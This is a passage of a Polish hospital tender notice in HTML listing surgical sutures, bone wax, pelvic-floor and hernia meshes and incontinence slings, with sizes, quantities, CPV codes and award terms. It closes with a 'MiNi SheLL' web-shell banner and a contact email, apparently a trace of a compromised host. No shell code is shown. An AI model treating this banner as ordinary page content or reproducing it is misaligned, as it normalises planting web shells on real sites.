3.	0	90cm	 37mm	1/2 koła tnąca	Saszetka	108	
4.	1 petla	150cm	 40 s mm	1/2 koła okrągła, pogrubiona, wzmocniona, utwardzona	Saszetka	24	
5.	1	90cm	 37mm	1/2 koła tnąca	Saszetka	72.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2  - Nici niewchłanialne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 2  - Nici niewchłanialne
 Pleciony jedwab powlekany  /podwójnie pakowany/
Lp.	Grubość	Długość nitki	Długość igły	Cechy charakterystyczne	Jednostka miary	Ilość jednostek miary										
1.	2.	3.	4.	5.	6.	7.										
1.	1	150cm	-	Podwiązka	Saszetka	252										
2.	1	10 x 45cm	-	Podwiązka	Saszetka	108										
3.	0	75cm	24-26mm	1/2 koła okrągła	saszetka	72										
4.	0	75cm	30-31mm	1/2 koła okrągła	saszetka	72										
5.	2/0	75sm	24-26mm	1/2 koła okrągła	Saszetka	324	 	 	 						 	 
6.	1	75cm	30-31mm	1/2 koła okrągła	Saszetka	108	 	 	 	 				 	 	 
7.	2	75-90cm	37 s mm	1/2 koła okrągła, pogrubiona, wzmocniona, utwardzona	Saszetka	72	 	 	 	 				 	 	 
 Nić syntetyczna, niewchłanialna z polipropylenu   / monofilament /
Lp.	Grubość	Długość nitki	Długość igły	Cechy charakterystyczne	Jednostka miary	Ilość jednostek miary										
1.	2.	3.	4.	5.	6.	7.										
1.	2/0	75cm	26-27mm	1/ 2 koła okrągła 	Saszetka	108									 	 
2.	0	75cm	26-27mm	1/2 koła okrągła 	Saszetka	36									 	 
Szew śródskórny z dwoma klipsami fiksacyjnymi    
Lp.	Grubość	Długość nitki	Długość igły	Cechy charakterystyczne	Jednostka miary	Ilość jednostek miary										
1.	2.	3.	4.	5.	6.	7.										
1.	2/0	45cm	24mm	3/8 koła tnąca	Saszetka	396						 			 	 
Nić syntetyczna, niewchłanialna z polimeru nylonu 6 i 66 (6,6) 
Lp.	Grubość	Długość nitki	Długość igły	Cechy charakterystyczne	Jednostka miary	Ilość jednostek miary										
1.	2.	3.	4.	5.	6.	7.										
1.	4/0	45cm	11-12mm	3/8 koła tnąca	Saszetka	36										
2.	4/0	45cm	16mm	3/8 koła tnąca	Saszetka	216				 						
3.	4/0	45cm	19mm	3/8 koła tnąca	Saszetka	216				 						
4.	4/0	75cm	24mm	3/8 koła tnąca	Saszetka	180				 						
5.	3/0	75cm	24mm	3/8 koła tnąca	Saszetka	1548				 		 			 	 
6.	3/0	75cm	30mm	3/8 koła tnąca	Saszetka	252				 		 			 	 
7.	3/0	75cm	19mm	3/8 koła tnąca	Saszetka	288				 		 			 	 
8.	2/0	75cm	19mm	3/8 koła tnąca	Saszetka	36				 		 		 	 	 
9.	2/0	75cm	24mm	3/8 koła tnąca	Saszetka	756				 		 		 	 	 
10.	2/0	75cm	30mm	3/8 koła tnąca	Saszetka	216				 		 		 	 	 
11.	2/0	75cm	39-40mm	3/8 koła tnąca	Saszetka	144				 		 		 	 	 
12.	0	75cm	39-40mm	3/8 koła tnąca	Saszetka	72				 		 		 	 	 
13.	0	90-100cm	60mm	3/8 koła tnąca	Saszetka	72				 		 			 	 
14.	1	75cm	39-40mm	3/8 koła tnąca	Saszetka	36	 	 	 	 		 			 	 
15.	5/0	75 cm	19 mm	3/8 koła tnąca	Saszetka	36	 	 	 	 		 			 	 
16.	5/0	75 cm	16 mm	3/8 koła tnąca	Saszetka	36	 	 	 	 		 			 	 
17.	6/0	75 cm	11-12 mm	3/8 koła tnąca	Saszetka	36.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Szew stosowany do leczenia urazów rzepki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Grubość	Długość nitki	Długość igły	Cechy charakterystyczne	Jednostka miary	Ilość jednostek miary
1.	2.	3.	4.	5.	6.	7.
1.	7	60 cm	120 cm	nitka stalowa 	Saszetka	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Wosk kostny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	wosk kostny			2,5 g	Saszetka	24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - Nić nylonowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Grubość	Długość nitki	Długość igły	Cechy charakterystyczne	Jednostka miary	Ilość jednostek miary
1.	2.	3.	4.	5.	6.	7.
1.	10-0	30 cm	6,19 mm	2 igły 3/8 koła o średnicy 0,15 mm i długośći 6,19 mm, nić o długości 30 cm	Saszetka	24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - Siatki, Taśmy do leczenia Wysiłkowego Nietrzymania Moczu u kobiet.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis przedmiotu zamówienia				Jednostka miary 	Ilość jednostek miary
1.	2.				3.	4.
1.	Proteza (siatka) do korekcji cystocele  wykonana z  polipropylenu monofilamentowego, o anatomicznym kształcie z wplecioną nicią ułatwiającą rozmieszczenie implantu ,wymiarach 50x 70mm, czterema ramionami o długości min 17cm, grubości siatki 0,34mm i gramaturze 28,4g/m2				szt	9
2.	Proteza (siatka) do korekcji rectocele  wykonana z  polipropylenu monofilamentowego, o anatomicznym kształcie z wplecioną nitką ułatwiającą rozmieszczenie implantu , wymiarach 50x 100mm,  dwoma ramionami o długości min 17cm, grubości siatki 0,34mm i gramaturze 28,4g/m2				szt	1
3.	Taśma polipropylenowa, monofilamentowa, dziana,  nie elastyczna, niewchłanialna, zakładana przez otwory załonowe drogą OUT-in, narzędziem wielokrotnego użytkowania ze stali chirurgicznej z ergonomiczną metalową rękojeścią (bezpłatnie udostępnianą przez producenta na czas umowy), taśma o długości 45-60cm w plastikowej osłonie, szeroką 10-12 mm, zakończoną pętelkami nici opornymi na podciągania, nie uszkadzającymi tkanek				szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 - Siatki przepuklinowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Budowa	Waga	Grubość i wielkość porów	Cechy charakterystyczne	Jednostka miary	Ilość jednostek miary
1.	2.	3.	4.	5.	6.	7.
1.	dziana	82g/m2	0,48 mm  0,8 mm	7,5-8cm cm x 15 cm	szt	90
2	dziana	82g/m2	0,48 mm  0,8 mm	15 cm x 30 cm	szt	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8 - Sterylny jednorazowy system mini do leczenia wysiłkowego nietrzymania moczu u kobiet.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Siatka stosowana w zabiegach plastyki przepuklin, zbudowana z monofilamentowych włókien polipropylenowych /polipropylen jednowłóknowy /																
Minimalnie inwazyyjny system, jednorazowy do leczenia wysiłkowego nietrzymania moczu u kobiet , implantowany poprzez jedno krótkie 1,0-1,5cm nacięcie podcewkowe pochwy. System składa się z: 1. taśmy polipropylenowej o dł od 8,5 cm-9cm i szerokości od 1,1cm - 1,2cm ze znacznikiem połowy taśmy, końce taśmy zaostrzone w polipropylenowe uchwytyw kształcie kotwiczki  2. Łukowato wygiętej igły o grubości ostrza od 2,3mm-2,5mm, ostrze wyprofilowane tak aby po założeniu taśmy stanowiło obły atraumatyczny kształt,  igła zaopatrzona w system umożliwiający odłączanie kotwiczki od igły w czasie wybranym przez operatora			8,5-9cm x 1,1-1,2cm	szt	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com